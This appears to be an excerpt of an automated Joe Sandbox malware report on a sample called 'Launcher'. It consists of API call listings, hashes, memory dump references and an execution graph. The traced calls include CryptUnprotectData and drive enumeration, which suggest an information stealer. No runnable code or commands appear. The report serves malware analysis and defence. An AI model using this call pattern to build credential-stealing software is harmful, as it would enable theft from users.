                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,0025760B,000000FF,?,0024C035,00000002,?,0024C0D1,0024D3C0), ref: 0024BFDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: 2dea49e25f10c28c8200b08be155c03bc2dbdb2ed6cfbdd7ee686686c2a0e5aa
                                                                        • Instruction ID: a4cc777649e287f6b8a6c3a6cb47fc47f9d6e0af4969ae93cb0da869a6bb8d0e
                                                                        • Opcode Fuzzy Hash: 2dea49e25f10c28c8200b08be155c03bc2dbdb2ed6cfbdd7ee686686c2a0e5aa
                                                                        • Instruction Fuzzy Hash: 0B01A231A54719AFDB068F54EC09FAEBBB8FB04B15F054125F816A2A90DB749904CE94
                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 00252FC2
                                                                        • __alloca_probe_16.LIBCMT ref: 0025308B
                                                                        • __freea.LIBCMT ref: 002530F2
                                                                          • Part of subcall function 00250C65: RtlAllocateHeap.NTDLL(00000000,?,-A3400188,?,00249200,?,?,002467E7,?,00246199), ref: 00250C97
                                                                        • __freea.LIBCMT ref: 00253105
                                                                        • __freea.LIBCMT ref: 00253112
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1423051803-0
                                                                        • Opcode ID: c11dd876a7af474c10bd18dd124b5d868ede5d5841d3bbc3323ec7df633829a3
                                                                        • Instruction ID: fa118cabc426f0cc2674c68755fbc21000f311d98e44259a49cf93a489b0e573
                                                                        • Opcode Fuzzy Hash: c11dd876a7af474c10bd18dd124b5d868ede5d5841d3bbc3323ec7df633829a3
                                                                        • Instruction Fuzzy Hash: 2451DB716206076FDF21DF70CC86DBB7AA9EF44792F154129FC08D6140EA70DE789A68
                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0024E41E,?,?,00000000,00000000,00000000,?), ref: 0024E53D
                                                                        • CatchIt.LIBVCRUNTIME ref: 0024E623
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CatchEncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 1435073870-2084237596
                                                                        • Opcode ID: 8e97fc4f980a1e9718ff17772f3c7a71eeaaa24ef3ad30e22e17631eff29cc64
                                                                        • Instruction ID: bdcc3710ae00203cad191a01be62300b8e984b7b8ab37c48dc300580d6848b7e
                                                                        • Opcode Fuzzy Hash: 8e97fc4f980a1e9718ff17772f3c7a71eeaaa24ef3ad30e22e17631eff29cc64
                                                                        • Instruction Fuzzy Hash: 65419E7191010AAFDF1ADF98CC81AEE7BB9FF58304F1A8059F904A7211E335AA60DF51
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00252D1A,00000000,?,00261CD0,?,?,?,00252C51,00000004,InitializeCriticalSectionEx,002596F8,00259700), ref: 00252C8B
                                                                        • GetLastError.KERNEL32(?,00252D1A,00000000,?,00261CD0,?,?,?,00252C51,00000004,InitializeCriticalSectionEx,002596F8,00259700,00000000,?,0024E73C), ref: 00252C95
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00252CBD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID: api-ms-
                                                                        • API String ID: 3177248105-2084034818
                                                                        • Opcode ID: fc4fbb88cdedd620c212fb2565ec905cd23d1c7346a0778ee84474ef0df60739
                                                                        • Instruction ID: d6ebdbb95cc9d3c9adf02d7231c8e7d45b9f5d42d99e3047ee5cf4fc4ff53523
                                                                        • Opcode Fuzzy Hash: fc4fbb88cdedd620c212fb2565ec905cd23d1c7346a0778ee84474ef0df60739
                                                                        • Instruction Fuzzy Hash: 93E01230250305FAEF201F60ED0EB6C3B59AB01B57F554421FD0DB41E1E7719968995D
                                                                        APIs
                                                                        • GetConsoleOutputCP.KERNEL32(58D485F2,00000000,00000000,?), ref: 0025366B
                                                                          • Part of subcall function 00252151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,0024D7D1,?,00000000,?), ref: 002521B2
                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002538BD
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00253903
                                                                        • GetLastError.KERNEL32 ref: 002539A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                        • String ID:
                                                                        • API String ID: 2112829910-0
                                                                        • Opcode ID: 329785913073bf6feaa877488d0a20efe78a1ab89bafa36ba686b8b27dacb0fa
                                                                        • Instruction ID: fb335ddc0cb2ffca9109233d388d7c2e5384682f45e5f45da7f9c0893cdd9d99
                                                                        • Opcode Fuzzy Hash: 329785913073bf6feaa877488d0a20efe78a1ab89bafa36ba686b8b27dacb0fa
                                                                        • Instruction Fuzzy Hash: E3D1BBB1D102489FCF15CFA8C884AADBBB8FF48311F28412AE816EB351D770AA55CF54
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: 5f89b67827c6287e421840059e3e8dbd86fabdc66a2bebabc0de7908b3c4189c
                                                                        • Instruction ID: a92c3dea84bbd2200dfaae00011cbf8b23f87f7b9096b57b1cc6f93925755fee
                                                                        • Opcode Fuzzy Hash: 5f89b67827c6287e421840059e3e8dbd86fabdc66a2bebabc0de7908b3c4189c
                                                                        • Instruction Fuzzy Hash: 1351B171624202AFFF2D9F10D841BBA77A4FF00300F264429E9166B691E7B2EC68CB51
                                                                        APIs
                                                                          • Part of subcall function 00252151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,0024D7D1,?,00000000,?), ref: 002521B2
                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,0025197E,?,?,?,00000000), ref: 0025163C
                                                                        • __dosmaperr.LIBCMT ref: 00251643
                                                                        • GetLastError.KERNEL32(00000000,0025197E,?,?,00000000,?,?,?,00000000,00000000,?,0025197E,?,?,?,00000000), ref: 0025167D
                                                                        • __dosmaperr.LIBCMT ref: 00251684
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 1913693674-0
                                                                        • Opcode ID: de512c0ad8365e933352324ccdca09f85817dacc7445c9dbee63e34a66561cc5
                                                                        • Instruction ID: 5f6acfc630fc0401976f7756cd3c7adac9577ceec96e1ed7c98a06489e4db1bf
                                                                        • Opcode Fuzzy Hash: de512c0ad8365e933352324ccdca09f85817dacc7445c9dbee63e34a66561cc5
                                                                        • Instruction Fuzzy Hash: CE21C571620206AFDB24AF619C81E7AB7ADEF043667148518FC2997151E770EC388F98
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00252255
                                                                          • Part of subcall function 00252151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,0024D7D1,?,00000000,?), ref: 002521B2
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025228D
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002522AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 158306478-0
                                                                        • Opcode ID: 51c1ddc1032376a6b9643c4a2b402f93ae40c74ca3e8e6f304054306f0a3e51b
                                                                        • Instruction ID: 34f5fea08f2dd9389c5a972b7373d43d63b75efb4ca560e0c8482b5864b3407b
                                                                        • Opcode Fuzzy Hash: 51c1ddc1032376a6b9643c4a2b402f93ae40c74ca3e8e6f304054306f0a3e51b
                                                                        • Instruction Fuzzy Hash: 9F118EB5631615BB6B112B716CCDC7F295CDE56397B110025FC01E1181FA708E2E99BD
                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00254F51,00000000,00000001,00000000,?,?,002539FA,?,00000000,00000000), ref: 002557F7
                                                                        • GetLastError.KERNEL32(?,00254F51,00000000,00000001,00000000,?,?,002539FA,?,00000000,00000000,?,?,?,00253340,00000000), ref: 00255803
                                                                          • Part of subcall function 00255860: CloseHandle.KERNEL32(FFFFFFFE,00255813,?,00254F51,00000000,00000001,00000000,?,?,002539FA,?,00000000,00000000,?,?), ref: 00255870
                                                                        • ___initconout.LIBCMT ref: 00255813
                                                                          • Part of subcall function 00255835: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002557D1,00254F3E,?,?,002539FA,?,00000000,00000000,?), ref: 00255848
                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00254F51,00000000,00000001,00000000,?,?,002539FA,?,00000000,00000000,?), ref: 00255828
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: 1bd55e134945fdec1ac0eae1aba38c98fd4896d86c72341426006c025b9c56c0
                                                                        • Instruction ID: 61dd0dc1c605e0918ffd4b49df069076939a96917b35eeffe3535e4b72ce0bd9
                                                                        • Opcode Fuzzy Hash: 1bd55e134945fdec1ac0eae1aba38c98fd4896d86c72341426006c025b9c56c0
                                                                        • Instruction Fuzzy Hash: BCF01C36520529BBCF222F91EC0C98A3F26EB083A2F068011FE0885120D6729964EB99
                                                                        APIs
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0024DD95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ___except_validate_context_record
                                                                        • String ID: csm$csm
                                                                        • API String ID: 3493665558-3733052814
                                                                        • Opcode ID: 2b7f9347bb7ccd960ba211c5f026e36b24fd979e12f3f4a9af94d7ee7f4dadb3
                                                                        • Instruction ID: 8e62afe8f310f17c0be8f86bce747a4b7be3ec9a31038512136fcd8541681236
                                                                        • Opcode Fuzzy Hash: 2b7f9347bb7ccd960ba211c5f026e36b24fd979e12f3f4a9af94d7ee7f4dadb3
                                                                        • Instruction Fuzzy Hash: 7531E476A20216EBCF2E8F50CC4496A7B65FF29715B18865AF8544E121C373CC72DB81

                                                                        Execution Graph

                                                                        Execution Coverage:5.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:42.3%
                                                                        Total number of Nodes:286
                                                                        Total number of Limit Nodes:30
                                                                        execution_graph 19473 408ae0 19474 408aef 19473->19474 19475 408d34 ExitProcess 19474->19475 19476 408af7 SHGetSpecialFolderPathW 19474->19476 19477 408b0d 19476->19477 19478 408b15 GetCurrentThreadId GetCurrentProcessId 19477->19478 19481 408d2a 19477->19481 19479 408b54 GetForegroundWindow 19478->19479 19480 408b4c 19478->19480 19482 408c7c 19479->19482 19480->19479 19481->19475 19482->19481 19484 40d260 CoInitializeEx 19482->19484 19485 40afe0 19486 40b020 19485->19486 19487 43b070 RtlFreeHeap 19486->19487 19488 40b516 19486->19488 19487->19488 19489 42fc22 CoSetProxyBlanket 19490 418be3 19491 418be8 19490->19491 19491->19491 19492 43ff30 LdrInitializeThunk 19491->19492 19493 418e0d 19492->19493 19495 418e9d 19493->19495 19503 418e56 19493->19503 19512 440280 19493->19512 19498 4196c7 19500 41df00 3 API calls 19498->19500 19499 419216 CryptUnprotectData 19499->19495 19501 419240 19499->19501 19499->19503 19500->19495 19501->19495 19501->19498 19504 419505 19501->19504 19517 41df00 19501->19517 19503->19495 19503->19499 19503->19501 19506 440350 19503->19506 19516 43d920 LdrInitializeThunk 19503->19516 19504->19495 19504->19498 19504->19504 19505 4400e0 LdrInitializeThunk 19504->19505 19505->19504 19507 440380 19506->19507 19510 4403ce 19507->19510 19529 43d920 LdrInitializeThunk 19507->19529 19508 44046e 19508->19503 19510->19508 19530 43d920 LdrInitializeThunk 19510->19530 19514 4402b0 19512->19514 19513 4402fe 19513->19503 19514->19513 19531 43d920 LdrInitializeThunk 19514->19531 19516->19503 19518 41df50 19517->19518 19518->19518 19532 418490 19518->19532 19520 41e034 19521 418490 3 API calls 19520->19521 19522 41e0dc 19521->19522 19523 418490 3 API calls 19522->19523 19524 41e196 19523->19524 19525 418490 3 API calls 19524->19525 19526 41e24b 19525->19526 19527 418490 3 API calls 19526->19527 19528 41e2c8 19527->19528 19528->19504 19529->19510 19530->19508 19531->19513 19533 4184a0 19532->19533 19533->19533 19534 43ff30 LdrInitializeThunk 19533->19534 19536 41856e 19534->19536 19535 418640 19538 41869c 19535->19538 19541 440280 LdrInitializeThunk 19535->19541 19543 4186cb 19535->19543 19546 41864c 19535->19546 19536->19535 19537 418633 19536->19537 19536->19538 19536->19543 19536->19546 19547 439040 19536->19547 19537->19535 19537->19538 19540 43ff30 LdrInitializeThunk 19537->19540 19537->19543 19537->19546 19542 440350 LdrInitializeThunk 19538->19542 19538->19543 19538->19546 19540->19535 19541->19538 19542->19543 19543->19546 19564 43d920 LdrInitializeThunk 19543->19564 19545 41896d 19546->19520 19546->19546 19548 43ff30 LdrInitializeThunk 19547->19548 19549 43906b 19548->19549 19550 439132 19549->19550 19551 4391be 19549->19551 19552 43907a 19549->19552 19554 43b030 RtlAllocateHeap 19549->19554 19557 439090 19549->19557 19560 4391cb 19549->19560 19555 43b070 RtlFreeHeap 19550->19555 19556 43b030 RtlAllocateHeap 19551->19556 19552->19537 19554->19551 19561 439138 19555->19561 19556->19560 19557->19550 19557->19552 19565 43b630 19557->19565 19569 43b450 19557->19569 19573 43b700 19557->19573 19560->19557 19582 43d920 LdrInitializeThunk 19560->19582 19561->19552 19581 43d920 LdrInitializeThunk 19561->19581 19564->19545 19566 43b63a 19565->19566 19568 43b6ce 19565->19568 19566->19568 19583 43d920 LdrInitializeThunk 19566->19583 19568->19557 19570 43b552 19569->19570 19571 43b462 19569->19571 19570->19557 19571->19570 19584 43d920 LdrInitializeThunk 19571->19584 19574 43b7c3 19573->19574 19576 43b716 19573->19576 19574->19557 19575 43b91e 19575->19574 19577 43b630 LdrInitializeThunk 19575->19577 19576->19574 19579 43b7be 19576->19579 19585 43d920 LdrInitializeThunk 19576->19585 19577->19574 19579->19575 19586 43d920 LdrInitializeThunk 19579->19586 19581->19552 19582->19557 19583->19568 19584->19570 19585->19579 19586->19575 19228 43b100 19229 43b130 19228->19229 19231 43b19e 19229->19231 19238 43d920 LdrInitializeThunk 19229->19238 19230 43b420 19231->19230 19239 43b030 19231->19239 19235 43b248 19237 43b2ee 19235->19237 19242 43d920 LdrInitializeThunk 19235->19242 19243 43b070 19237->19243 19238->19231 19240 43b040 19239->19240 19240->19240 19241 43b054 RtlAllocateHeap 19240->19241 19241->19235 19242->19237 19244 43b0f6 19243->19244 19245 43b088 RtlFreeHeap 19243->19245 19244->19230 19245->19244 19587 438660 19588 438685 19587->19588 19592 43874a 19588->19592 19596 43d920 LdrInitializeThunk 19588->19596 19590 438967 19592->19590 19593 438846 19592->19593 19595 43d920 LdrInitializeThunk 19592->19595 19593->19590 19597 43d920 LdrInitializeThunk 19593->19597 19595->19592 19596->19588 19597->19593 19247 40e085 19248 40e0a0 19247->19248 19250 40e0ee 19248->19250 19323 43d920 LdrInitializeThunk 19248->19323 19251 40e17e 19250->19251 19324 43d920 LdrInitializeThunk 19250->19324 19267 424470 19251->19267 19254 40e1c9 19280 424db0 19254->19280 19256 40e1e9 19286 425080 19256->19286 19258 40e209 19294 426910 19258->19294 19268 4244d0 19267->19268 19269 424654 19268->19269 19270 4247a1 19268->19270 19336 4400e0 19268->19336 19269->19254 19270->19269 19273 424905 19270->19273 19276 424a87 19270->19276 19340 4228a0 19270->19340 19274 424a71 GetLogicalDrives 19273->19274 19275 4400e0 LdrInitializeThunk 19274->19275 19275->19276 19277 424bc1 GetLogicalDrives 19276->19277 19278 4400e0 LdrInitializeThunk 19277->19278 19279 424bd7 19278->19279 19281 424e60 19280->19281 19281->19281 19282 424fa0 19281->19282 19284 424f50 19281->19284 19370 4409f0 19281->19370 19364 420970 19282->19364 19284->19256 19287 425090 19286->19287 19382 440620 19287->19382 19289 4409f0 3 API calls 19291 425206 19289->19291 19290 424fa0 19293 420970 3 API calls 19290->19293 19291->19289 19291->19290 19292 424f60 19291->19292 19292->19258 19293->19292 19295 40e229 19294->19295 19296 426946 19294->19296 19303 427140 19295->19303 19296->19295 19296->19296 19297 4409f0 3 API calls 19296->19297 19299 440620 LdrInitializeThunk 19296->19299 19302 43d920 LdrInitializeThunk 19296->19302 19387 43d880 19296->19387 19396 440740 19296->19396 19406 440fb0 19296->19406 19297->19296 19299->19296 19302->19296 19304 427160 19303->19304 19306 42719e 19304->19306 19420 43d920 LdrInitializeThunk 19304->19420 19305 40e232 19313 427580 19305->19313 19306->19305 19308 43b030 RtlAllocateHeap 19306->19308 19310 427208 19308->19310 19309 43b070 RtlFreeHeap 19309->19305 19312 42725e 19310->19312 19421 43d920 LdrInitializeThunk 19310->19421 19312->19309 19422 4275a0 19313->19422 19323->19250 19324->19251 19338 440100 19336->19338 19337 44022e 19337->19270 19338->19337 19355 43d920 LdrInitializeThunk 19338->19355 19356 43ff30 19340->19356 19342 423133 19342->19273 19343 4228e0 19343->19342 19344 43b030 RtlAllocateHeap 19343->19344 19347 422939 19344->19347 19346 42307d 19348 43b070 RtlFreeHeap 19346->19348 19352 4229e1 19347->19352 19360 43d920 LdrInitializeThunk 19347->19360 19350 42308d 19348->19350 19349 43b030 RtlAllocateHeap 19349->19352 19350->19342 19362 43d920 LdrInitializeThunk 19350->19362 19352->19346 19352->19349 19354 43b070 RtlFreeHeap 19352->19354 19361 43d920 LdrInitializeThunk 19352->19361 19354->19352 19355->19337 19358 43ff50 19356->19358 19357 44008e 19357->19343 19358->19357 19363 43d920 LdrInitializeThunk 19358->19363 19360->19347 19361->19352 19362->19350 19363->19357 19369 420980 19364->19369 19365 4400e0 LdrInitializeThunk 19367 420aba 19365->19367 19366 420a97 19366->19284 19367->19366 19368 4228a0 3 API calls 19367->19368 19368->19366 19369->19365 19369->19366 19369->19367 19371 440a20 19370->19371 19373 440a6e 19371->19373 19380 43d920 LdrInitializeThunk 19371->19380 19372 43b030 RtlAllocateHeap 19377 440aaf 19372->19377 19373->19372 19376 440cb4 19373->19376 19375 43b070 RtlFreeHeap 19375->19376 19376->19281 19379 440b1e 19377->19379 19381 43d920 LdrInitializeThunk 19377->19381 19379->19375 19379->19379 19380->19373 19381->19379 19383 440640 19382->19383 19384 44070f 19383->19384 19386 43d920 LdrInitializeThunk 19383->19386 19384->19291 19386->19384 19388 43d901 19387->19388 19389 43d8f6 19387->19389 19390 43d8aa RtlReAllocateHeap 19387->19390 19391 43d89c 19387->19391 19393 43b070 RtlFreeHeap 19388->19393 19392 43b030 RtlAllocateHeap 19389->19392 19394 43d8fc 19390->19394 19391->19388 19391->19390 19392->19394 19393->19394 19394->19296 19397 440760 19396->19397 19398 4407ae 19397->19398 19416 43d920 LdrInitializeThunk 19397->19416 19399 4409cd 19398->19399 19401 43b030 RtlAllocateHeap 19398->19401 19399->19296 19403 44082f 19401->19403 19402 43b070 RtlFreeHeap 19402->19399 19405 44089f 19403->19405 19417 43d920 LdrInitializeThunk 19403->19417 19405->19402 19407 440fbf 19406->19407 19409 44107e 19407->19409 19418 43d920 LdrInitializeThunk 19407->19418 19408 441275 19408->19296 19409->19408 19410 43b030 RtlAllocateHeap 19409->19410 19412 441124 19410->19412 19414 4411be 19412->19414 19419 43d920 LdrInitializeThunk 19412->19419 19413 43b070 RtlFreeHeap 19413->19408 19414->19413 19416->19398 19417->19405 19418->19409 19419->19414 19420->19306 19421->19312 19423 427610 19422->19423 19423->19423 19426 43b100 19423->19426 19427 43b130 19426->19427 19429 43b19e 19427->19429 19436 43d920 LdrInitializeThunk 19427->19436 19428 427683 19429->19428 19431 43b030 RtlAllocateHeap 19429->19431 19433 43b248 19431->19433 19432 43b070 RtlFreeHeap 19432->19428 19435 43b2ee 19433->19435 19437 43d920 LdrInitializeThunk 19433->19437 19435->19432 19436->19429 19437->19435 19598 422470 19599 42247e 19598->19599 19603 4224c0 19598->19603 19604 422580 